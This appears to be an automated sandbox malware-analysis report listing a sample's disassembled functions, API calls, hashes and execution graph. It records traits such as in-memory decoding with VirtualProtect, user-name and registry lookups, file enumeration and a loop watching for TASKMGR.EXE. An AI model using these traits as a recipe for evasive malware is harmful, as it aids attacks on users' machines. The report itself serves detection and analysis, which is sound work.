                                                                                                                                            • Instruction ID: 2fe96bac38b2fc24419a11ae13f276aa846cca3830b2a4f22f9b69f7504e5f05
                                                                                                                                            • Opcode Fuzzy Hash: 6e8d5e137584c381e20ea9706880095b876283494e3447111605740a7aef6abd
                                                                                                                                            • Instruction Fuzzy Hash: 611177722045016FDA055E786F9AE2F226D9BC6778B20027DF2349E2C0EF2DCC0D4213
                                                                                                                                            Function 6B7AE5D0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • QueryPerformanceCounter.KERNEL32(6B79F03B,?,6B77669E,6B79F03B,?,?,?,?), ref: 6B7AE5E5
                                                                                                                                            • __alldvrm.LIBCMT ref: 6B7AE5FE
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B7AE627
                                                                                                                                            • GetTickCount.KERNEL32 ref: 6B7AE642
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1296068966-0
                                                                                                                                            • Opcode ID: 55b0a59419d5fb9fc94c4f132fe3e931eea89cb49bc5351c4ed60430acc5b6a4
                                                                                                                                            • Instruction ID: 47b48175796c57842e901699d556f3d68a6c06a5384f39d854a9eb8e50f3accd
                                                                                                                                            • Opcode Fuzzy Hash: 55b0a59419d5fb9fc94c4f132fe3e931eea89cb49bc5351c4ed60430acc5b6a4
                                                                                                                                            • Instruction Fuzzy Hash: B6119176A04208AFDB548FA8DD95A69BFFCEB4D304F1085BEB90DC7350D6369D118B44
                                                                                                                                            Function 6B7D85FF Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6B7D5102,00000000,00000001,00000000,00000000,?,6B7CE891,?,6B7C92EA,00000000), ref: 6B7D8616
                                                                                                                                            • GetLastError.KERNEL32(?,6B7D5102,00000000,00000001,00000000,00000000,?,6B7CE891,?,6B7C92EA,00000000,?,00000000,?,6B7CEDE5,?), ref: 6B7D8622
                                                                                                                                              • Part of subcall function 6B7D85E8: CloseHandle.KERNEL32(FFFFFFFE,6B7D8632,?,6B7D5102,00000000,00000001,00000000,00000000,?,6B7CE891,?,6B7C92EA,00000000,?,00000000), ref: 6B7D85F8
                                                                                                                                            • ___initconout.LIBCMT ref: 6B7D8632
                                                                                                                                              • Part of subcall function 6B7D85AA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6B7D85D9,6B7D50EF,00000000,?,6B7CE891,?,6B7C92EA,00000000,?), ref: 6B7D85BD
                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6B7D5102,00000000,00000001,00000000,00000000,?,6B7CE891,?,6B7C92EA,00000000,?), ref: 6B7D8647
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            • Opcode ID: 7e07ef7383a5177321c6c6b634a8a1274a5a2331b59bafc5f57701653a51302b
                                                                                                                                            • Instruction ID: 84a9bbe8e1c9f57adab9e70b24f76cfebc1ea34f1ea875126a7aa7cba57c1c80
                                                                                                                                            • Opcode Fuzzy Hash: 7e07ef7383a5177321c6c6b634a8a1274a5a2331b59bafc5f57701653a51302b
                                                                                                                                            • Instruction Fuzzy Hash: 20F01C36404164BBCF121FA9CE09A8D3F76EF4A7F1F045060FA2985260DB32D820DB90
                                                                                                                                            Function 6B77AE10 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77AE35
                                                                                                                                            Strings
                                                                                                                                            • Can't get the size of %s, xrefs: 6B77AF14
                                                                                                                                            • Can't open %s for writing, xrefs: 6B77AE9E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                                            • String ID: Can't get the size of %s$Can't open %s for writing
                                                                                                                                            • API String ID: 601868998-3544860555
                                                                                                                                            • Opcode ID: df08f43ab745786e2f6e6bf4021faff3fdd969f7c1641e7a3b7be6f6bebf1a3f
                                                                                                                                            • Instruction ID: 81badcfca7700d030c3a33b95d744b1ac89b216d5cac2c692e1f8987b8d1d8dc
                                                                                                                                            • Opcode Fuzzy Hash: df08f43ab745786e2f6e6bf4021faff3fdd969f7c1641e7a3b7be6f6bebf1a3f
                                                                                                                                            • Instruction Fuzzy Hash: 5681C4B1E002089BDF24DFB8DE85AEEB7B5EF48304F10417DF91997200EB79A9558B91
                                                                                                                                            Function 6B776020 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,00000000), ref: 6B77615B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal
                                                                                                                                            • String ID: Set-Cookie:$none
                                                                                                                                            • API String ID: 482932555-3629594122
                                                                                                                                            • Opcode ID: 4020c228391d827ede4398a745324ff38905024775837d805d50141e1edaae0b
                                                                                                                                            • Instruction ID: 12c49472c25e47b894989367db7db70b503800ed847108ba0bc5fe76e6cac7a6
                                                                                                                                            • Opcode Fuzzy Hash: 4020c228391d827ede4398a745324ff38905024775837d805d50141e1edaae0b
                                                                                                                                            • Instruction Fuzzy Hash: 81512EB19043856BEF216A345E4ABAE3BA55F02748F0400F8FD559A347EB6EC745C372
                                                                                                                                            Function 6B788840 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7887E0: curl_msnprintf.LIBCURL(?,00000007,:%u,?,00000000,?,?,?,6B787CB2,?,?,?,00000106,?,00000000), ref: 6B788830
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000007,:%u,?,0000002A,?,?,?,?,?,00000000,00000000), ref: 6B7888CF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintf
                                                                                                                                            • String ID: :%u$Hostname in DNS cache was stale, zapped
                                                                                                                                            • API String ID: 1809024409-2924501231
                                                                                                                                            • Opcode ID: f84549c5897e4695dd9cac03f6e5e48b00b8bb3b824a6087a161587ac47857a6
                                                                                                                                            • Instruction ID: d6b7424bc94d812f9c08857c1564b40844cdcc4b2979f7d3b623ed28fd21af27
                                                                                                                                            • Opcode Fuzzy Hash: f84549c5897e4695dd9cac03f6e5e48b00b8bb3b824a6087a161587ac47857a6
                                                                                                                                            • Instruction Fuzzy Hash: CD41F331A00209ABCB19CF38CD85AEEB778EF05358F0042F9F95953201DB35AA56CF91
                                                                                                                                            Function 6B79DB40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_slist_append.LIBCURL(00000000,Content-Type: application/dns-message,0000013C,00000000,00000440,?,00000000,00000000,?,6B788617,00000000,00000000,?,00000000), ref: 6B79DB87
                                                                                                                                            • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?), ref: 6B79DC0D
                                                                                                                                            Strings
                                                                                                                                            • Content-Type: application/dns-message, xrefs: 6B79DB74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_appendcurl_slist_free_all
                                                                                                                                            • String ID: Content-Type: application/dns-message
                                                                                                                                            • API String ID: 2220803400-4173715026
                                                                                                                                            • Opcode ID: 5516fcab35b3a41fafa9438e456b26e4e1dbd9ddd8b71ac1ddb7b822b969813b
                                                                                                                                            • Instruction ID: 22ab4664d6f209682abb1207adbfb6ba82d652901821b0bfc01b2a43c74a3bf7
                                                                                                                                            • Opcode Fuzzy Hash: 5516fcab35b3a41fafa9438e456b26e4e1dbd9ddd8b71ac1ddb7b822b969813b
                                                                                                                                            • Instruction Fuzzy Hash: 6E21E7B2944B04AFE7119E30FD45BDBB7A9FF05308F004829FA2E93291D776A510CB90
                                                                                                                                            Function 6B7AAB80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7AABA5
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7AABD5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                                            • String ID: 8Twk
                                                                                                                                            • API String ID: 601868998-3312508639
                                                                                                                                            • Opcode ID: 9bf5e416b5dd8105ad433a63281058cab258d468c68ca83fe4601581a0470b8c
                                                                                                                                            • Instruction ID: 846e2edc4e9c3f713660ab0224e41812e1665ed609cda21111883bd052af4da9
                                                                                                                                            • Opcode Fuzzy Hash: 9bf5e416b5dd8105ad433a63281058cab258d468c68ca83fe4601581a0470b8c
                                                                                                                                            • Instruction Fuzzy Hash: E711DB355082519FEB418F24AD40BBABBBDEF06659F1401E5FCD48B242D339D815C7B0
                                                                                                                                            Function 6B7733D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • getsockopt.WS2_32(00004020,0000FFFF,00001001,00000000,00000004), ref: 6B77343B
                                                                                                                                            • setsockopt.WS2_32(00004020,0000FFFF,00001001,00004020,00000004), ref: 6B773460
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: getsockoptsetsockopt
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 194641219-2726393805
                                                                                                                                            • Opcode ID: 2e813b1fbba4cf35d34607a62bbebdfafd7d0d2ff2bf1cee35583a73d7b5e2a5
                                                                                                                                            • Instruction ID: 549eee54332d52f49e4a8a59c265739aa900dd0629f85dea1b76ec5f11cf2449
                                                                                                                                            • Opcode Fuzzy Hash: 2e813b1fbba4cf35d34607a62bbebdfafd7d0d2ff2bf1cee35583a73d7b5e2a5
                                                                                                                                            • Instruction Fuzzy Hash: 7401B5B1944209BBEF21DF94DD46FAD77B8EB01704F2041B0FA14AA2C0DBB99645DB40
                                                                                                                                            Function 6B78D8C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(Digest,6B78B74C,00000006,00000DD0,?,?,6B78B74C), ref: 6B78D8E6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal
                                                                                                                                            • String ID: Digest$t!
                                                                                                                                            • API String ID: 482932555-3305821177
                                                                                                                                            • Opcode ID: d6ec74e8adff235c9035c40f58928c4704f21993bf4cde8ead50036691dbe81f
                                                                                                                                            • Instruction ID: c1eafa9a3e4c1adca03f2605dbc78f6c73690d079c3d55180078a85a9563e912
                                                                                                                                            • Opcode Fuzzy Hash: d6ec74e8adff235c9035c40f58928c4704f21993bf4cde8ead50036691dbe81f
                                                                                                                                            • Instruction Fuzzy Hash: 77F0F653A4425426DF004E69BE01B9A779D8F92198F0800B6FD9C9B242E62EE5258AF0
                                                                                                                                            Function 6B7CFE5E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7CFE82
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                                                            • String ID: 8hwk$8hwk
                                                                                                                                            • API String ID: 1353095263-3323349157
                                                                                                                                            • Opcode ID: 9770ed075f98e788226680082193b8a9b24cb435b710d5a09513da189204d849
                                                                                                                                            • Instruction ID: 0a550b3db1046d9aa322355f2eadb0f4ee1074898122737dd73a24a1ceae5174
                                                                                                                                            • Opcode Fuzzy Hash: 9770ed075f98e788226680082193b8a9b24cb435b710d5a09513da189204d849
                                                                                                                                            • Instruction Fuzzy Hash: 80F06D371403059F8710CF68DA00A86B7E4EF99721310892AF89ED7210D330E516CB90
                                                                                                                                            Function 6B7A04D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29sleepnetworkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WSASetLastError.WS2_32(00002726,?,6B79744F,?,?,?,?,00000000,?), ref: 6B7A04EE
                                                                                                                                            • Sleep.KERNEL32(FFFFFFFE), ref: 6B7A0511
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastSleep
                                                                                                                                            • String ID: Otyk
                                                                                                                                            • API String ID: 1458359878-2505452948
                                                                                                                                            • Opcode ID: 298bc1577f5eb3af36c5fe3aa970f2a8f7c23dadcaa7407a23713e1f21e1f43d
                                                                                                                                            • Instruction ID: 7728d4523fdb52cd53330ed5c1b300f318ad2b7274d9f778151271e479953de9
                                                                                                                                            • Opcode Fuzzy Hash: 298bc1577f5eb3af36c5fe3aa970f2a8f7c23dadcaa7407a23713e1f21e1f43d
                                                                                                                                            • Instruction Fuzzy Hash: ABE09B712546094BEB585E7D4E04B5D3395BFC6774F10DF28F87A852D0FB79D4004540

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.4%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:6.1%
                                                                                                                                            Total number of Nodes:99
                                                                                                                                            Total number of Limit Nodes:13
                                                                                                                                            execution_graph 20994 7002768 SetErrorMode 20995 7004df8 20996 7004e41 20995->20996 21007 7004e57 20996->21007 20998 7004ec5 21001 7004e77 21001->20998 21002 7004e84 VirtualProtect 21001->21002 21020 7004a59 21002->21020 21004 7004eaa 21004->20998 21027 7002c61 21004->21027 21009 7004e64 21007->21009 21008 7004ec5 21009->21008 21010 7004d26 2 API calls 21009->21010 21011 7004e77 21010->21011 21011->21008 21012 7004e84 VirtualProtect 21011->21012 21013 7004a59 2 API calls 21012->21013 21014 7004eaa 21013->21014 21014->21008 21015 7002c61 8 API calls 21014->21015 21016 7004e4c 21015->21016 21016->20998 21017 7004d26 21016->21017 21033 7004ca3 RegOpenKeyExW 21017->21033 21019 7004de2 21019->21001 21021 7004a75 21020->21021 21022 7004a89 21021->21022 21023 7004aea 21021->21023 21026 7004aa3 21021->21026 21022->21026 21036 7004ed6 CryptStringToBinaryA CryptStringToBinaryA 21022->21036 21023->21026 21037 7004ed6 CryptStringToBinaryA CryptStringToBinaryA 21023->21037 21026->21004 21028 7002cb1 21027->21028 21038 7002dfb 21028->21038 21034 7004ce1 RegQueryValueExW 21033->21034 21035 7004d03 21033->21035 21034->21035 21035->21019 21036->21026 21037->21026 21039 7002e03 21038->21039 21040 7002e16 8 API calls 21039->21040 21041 7002dcf 21039->21041 21040->21039 21042 7002e16 21041->21042 21043 7002df6 21042->21043 21046 7002e31 21042->21046 21044 7002e56 VirtualAlloc 21044->21043 21045 7002e83 21044->21045 21047 7002eab 21045->21047 21052 70020f0 21045->21052 21046->21043 21046->21044 21049 7002f22 21047->21049 21051 7002ed1 VirtualProtect VirtualProtect 21047->21051 21058 7002196 21049->21058 21051->21049 21053 700210b 21052->21053 21054 700212d CreateFileA 21053->21054 21057 700217c 21053->21057 21055 7002150 CreateFileMappingA 21054->21055 21054->21057 21056 7002168 MapViewOfFileEx 21055->21056 21055->21057 21056->21057 21057->21047 21059 70021a2 21058->21059 21061 70021d4 21058->21061 21060 70021a8 UnmapViewOfFile CloseHandle 21059->21060 21059->21061 21060->21061 21061->21043 21062 7002f49 21063 7002f54 21062->21063 21064 7002f8f CreateFileA 21062->21064 21063->21064 21065 7002f5d StrRStrIA 21063->21065 21066 7002f71 StrRStrIA 21065->21066 21067 7002f85 21065->21067 21066->21064 21066->21067 21068 700221b 21069 700230b 21068->21069 21080 7002393 21069->21080 21071 7002330 21072 7002393 3 API calls 21071->21072 21073 7002344 21072->21073 21074 7002393 3 API calls 21073->21074 21075 7002354 21074->21075 21076 7002393 3 API calls 21075->21076 21077 7002364 21076->21077 21078 7002393 3 API calls 21077->21078 21079 7002371 21078->21079 21081 70023a5 21080->21081 21082 70023b7 21080->21082 21083 7004ca3 2 API calls 21081->21083 21085 70021ff GetUserNameA 21081->21085 21082->21071 21083->21082 21085->21082 21086 70025ab 21087 70025d2 21086->21087 21090 70025db lstrcat FindFirstFileA 21087->21090 21089 70025d7 21091 70025f9 21090->21091 21093 7002600 lstrcmp 21091->21093 21094 700264d FindNextFileA 21091->21094 21097 7002624 lstrcat 21091->21097 21098 7002600 lstrcmp 21091->21098 21105 7002613 lstrcmp 21091->21105 21093->21091 21093->21094 21094->21091 21095 700265e FindClose 21094->21095 21095->21089 21097->21091 21099 70025f9 21098->21099 21100 700264d FindNextFileA 21098->21100 21099->21098 21099->21100 21102 7002613 5 API calls 21099->21102 21103 7002600 5 API calls 21099->21103 21104 7002624 lstrcat 21099->21104 21100->21099 21101 700265e FindClose 21100->21101 21101->21091 21102->21099 21103->21099 21104->21099 21106 700264d FindNextFileA 21105->21106 21110 70025f9 21105->21110 21107 700265e FindClose 21106->21107 21106->21110 21107->21091 21108 7002624 lstrcat 21108->21110 21109 7002600 4 API calls 21109->21110 21110->21106 21110->21108 21110->21109 21111 7002600 lstrcmp 21110->21111 21112 7002613 4 API calls 21110->21112 21111->21106 21111->21110 21112->21110

                                                                                                                                            Executed Functions

                                                                                                                                            Function 070013E5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46sleepprocessCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,TASKMGR.EXE), ref: 070013F6
                                                                                                                                            • Process32First.KERNEL32(?,00000128), ref: 07001418
                                                                                                                                            • Process32Next.KERNEL32(?,00000128), ref: 07001426
                                                                                                                                            • Sleep.KERNEL32(00000001), ref: 0700144D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process32$CreateFirstNextSleepSnapshotToolhelp32
                                                                                                                                            • String ID: TASKMGR.EXE
                                                                                                                                            • API String ID: 1819645093-3666515839
                                                                                                                                            • Opcode ID: b358a52369e193c9e8517dc841a954da49eada74cce5cc24e7adddca5e57aff8
                                                                                                                                            • Instruction ID: 99b72031f18dc869c480a0657b30f758287839bb27282c91c7dd68041e829959
                                                                                                                                            • Opcode Fuzzy Hash: b358a52369e193c9e8517dc841a954da49eada74cce5cc24e7adddca5e57aff8
                                                                                                                                            • Instruction Fuzzy Hash: B5012171A00119ABDB209FA49C0EB9E7BF9FB05771F010250E645D25A0DBB8DA609B90
                                                                                                                                            Function 070025DB Relevance: 7.6, APIs: 5, Instructions: 51filestringCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • lstrcat.KERNEL32(?,070025D7), ref: 070025DC
                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 070025F0
                                                                                                                                              • Part of subcall function 07002600: lstrcmp.KERNEL32(?,070025FE), ref: 07002601
                                                                                                                                              • Part of subcall function 07002600: lstrcat.KERNEL32(?,?), ref: 0700262F
                                                                                                                                              • Part of subcall function 07002600: FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                              • Part of subcall function 07002600: FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                            Memory Dump Source
